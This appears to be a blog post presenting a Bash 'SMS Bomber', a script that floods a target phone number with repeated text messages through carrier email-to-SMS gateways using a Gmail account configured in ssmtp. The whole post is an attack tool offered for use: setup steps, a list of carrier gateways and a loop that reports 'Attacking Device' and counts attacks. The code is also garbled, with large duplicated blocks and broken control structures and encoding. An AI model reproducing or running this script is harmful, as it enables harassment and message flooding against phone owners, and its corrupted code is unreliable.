SMS Bomber allows you to set the message you want to send, the phone number to send it to, the carrier of the phone (which can be found at http://www.fonefinder.net), and the delay between messages. Youāll need to install āssmtpā
If youāre using Kali Linux you can type:
Code:
sudo apt-get install ssmtp
Youāll also need a Gmail account (Iām sure you could use another e-mail service, just make changes accordingly).
Then youāll need to edit the configuration file (located at /etc/ssmtp/ssmtp.conf)
Where it says:
Code:
# The place where the mail goes. The actual machine name is required no
# MX records are consulted. Commonly mailhosts are named mail.domain.com
mailhub=whatever
# MX records are consulted. Commonly mailhosts are named mail.domain.com
mailhub=whatever
Change it to mailhub=smtp.gmail.com:587
Then add this at the end of the configuration file:
Code:
AuthUser=YOURUSERNAME@gmail.com
AuthPass=YOURPASSWORD
UseSTARTTLS=YES
AuthPass=YOURPASSWORD
UseSTARTTLS=YES
Then, youāll need to save the following code as whatever you want (I call it smsbomber):
#! /bin/bash
COUNTER=0
SPEED=2
function usage {
echo āUSAGE: $0 [OPTIONS] ā¦ [ARGUMENTS]ā
echo
echo ā-p Phone Numberā
echo ā-c Carrier Codeā
echo ā-o Display Carrier Codesā
echo ā-m Message to Sendā
echo ā-t Number of Times to Send Messageā
echo ā-d Delay (in seconds) Between Messagesā
echo ā-h This Help Screenā
echo
echo āYou can check the carrier of a phone numberā
echo āat www.fonefinder.netā
echo
echo āInstead of using a preset carrier code, youā
echo ācan enter the SMS gateway of the carrierā
echo āusing the ā-cā option.ā
echo
echo āWritten by MrPockets (aka GhostNode) and disk0ā
exit
}
SPEED=2
function usage {
echo āUSAGE: $0 [OPTIONS] ā¦ [ARGUMENTS]ā
echo
echo ā-p Phone Numberā
echo ā-c Carrier Codeā
echo ā-o Display Carrier Codesā
echo ā-m Message to Sendā
echo ā-t Number of Times to Send Messageā
echo ā-d Delay (in seconds) Between Messagesā
echo ā-h This Help Screenā
echo
echo āYou can check the carrier of a phone numberā
echo āat www.fonefinder.netā
echo
echo āInstead of using a preset carrier code, youā
echo ācan enter the SMS gateway of the carrierā
echo āusing the ā-cā option.ā
echo
echo āWritten by MrPockets (aka GhostNode) and disk0ā
exit
}
function carriers {
echo āCarrier Codes:ā
echo
echo ā1 AT&Tā
echo ā2 Boost Mobileā
echo ā3 Cingularā
echo ā4 Nextelā
echo ā5 Sprintā
echo ā6 Verizon or Straigh Talkā
echo ā7 T-mobileā
echo ā8 TracFoneā
echo ā9 US Cellularā
echo ā10 Virgin Mobileā
exit
}
echo āCarrier Codes:ā
echo
echo ā1 AT&Tā
echo ā2 Boost Mobileā
echo ā3 Cingularā
echo ā4 Nextelā
echo ā5 Sprintā
echo ā6 Verizon or Straigh Talkā
echo ā7 T-mobileā
echo ā8 TracFoneā
echo ā9 US Cellularā
echo ā10 Virgin Mobileā
exit
}
if [ ā$1ā == āā ]; then
usage
fi
while [ ā$1ā != āā ]; do
case ā$1ā in
usage
fi
while [ ā$1ā != āā ]; do
case ā$1ā in
ā-pā)
shift
NUMBER=$1
;;
ā-cā)
shift
case ā$1ā in
ā1ā)
GATEWAY=ā@txt.att.netā
;;
ā2ā)
GATEWAY=ā@myboostmobile.comā
;;
ā3ā)
GATEWAY=ā@cingular.comā
;;
ā4ā)
GATEWAY=ā@messaging.nextel.comā
;;
ā5ā)
GATEWAY=ā@messaging.sprintpcs.comā
;;
ā6ā)
GATEWAY=ā@vtext.comā
;;
ā7ā)
GATEWAY=ā@tmomail.netā
;;
ā8ā)
GATEWAY=ā@mmst5.tracfone.comā
;;
ā9ā)
GATEWAY=ā@email.uscc.netā
;;
ā10ā)
GATEWAY=ā@yrmobl.comā
;;
*)
GATEWAY=$1
;;
esac
;;
ā-mā)
shift
MESSAGE=$1
;;
ā-dā)
shift
SPEED=$1
;;
ā-tā)
shift
TIMES=$1
;;
ā-hā)
usage
;;
ā-oā)
carriers
;;
*)
usage
;;
esac
shift
done
shift
NUMBER=$1
;;
ā-cā)
shift
case ā$1ā in
ā1ā)
GATEWAY=ā@txt.att.netā
;;
ā2ā)
GATEWAY=ā@myboostmobile.comā
;;
ā3ā)
GATEWAY=ā@cingular.comā
;;
ā4ā)
GATEWAY=ā@messaging.nextel.comā
;;
ā5ā)
GATEWAY=ā@messaging.sprintpcs.comā
;;
ā6ā)
GATEWAY=ā@vtext.comā
;;
ā7ā)
GATEWAY=ā@tmomail.netā
;;
ā8ā)
GATEWAY=ā@mmst5.tracfone.comā
;;
ā9ā)
GATEWAY=ā@email.uscc.netā
;;
ā10ā)
GATEWAY=ā@yrmobl.comā
;;
*)
GATEWAY=$1
;;
esac
;;
ā-mā)
shift
MESSAGE=$1
;;
ā-dā)
shift
SPEED=$1
;;
ā-tā)
shift
TIMES=$1
;;
ā-hā)
usage
;;
ā-oā)
carriers
;;
*)
usage
;;
esac
shift
done
echo >> delivery
echo >> delivery
echo $MESSAGE >> delivery
clear
echo ā Attacking Device at: $NUMBER ā
echo ā With Message: $MESSAGE ā
echo >> delivery
echo $MESSAGE >> delivery
clear
echo ā Attacking Device at: $NUMBER ā
echo ā With Message: $MESSAGE ā
until [ $TIMES -le $COUNTER ]; do
ssmtp $NUMBER$GATEWAY < delivery sleep $SPEED COUNTER=$(($COUNTER +1)) echo ================================== echo echo āAttack $COUNTER of $TIMESā echo echo Message: $MESSAGE date echo āCtrl+C to call off attackā echo ================================== done rm 1.txt rm delivery
ssmtp $NUMBER$GATEWAY < delivery sleep $SPEED COUNTER=$(($COUNTER +1)) echo ================================== echo echo āAttack $COUNTER of $TIMESā echo echo Message: $MESSAGE date echo āCtrl+C to call off attackā echo ================================== done rm 1.txt rm delivery
Make sure you change the permissions to make it executable:
Code:
sudo chmod 777 smsbomber
Then you can just type ./smsbomber or ./smsbomber -h for the help menu. You gues should be able to figure it out from there! Let me know what you think!
0 comments:
Post a Comment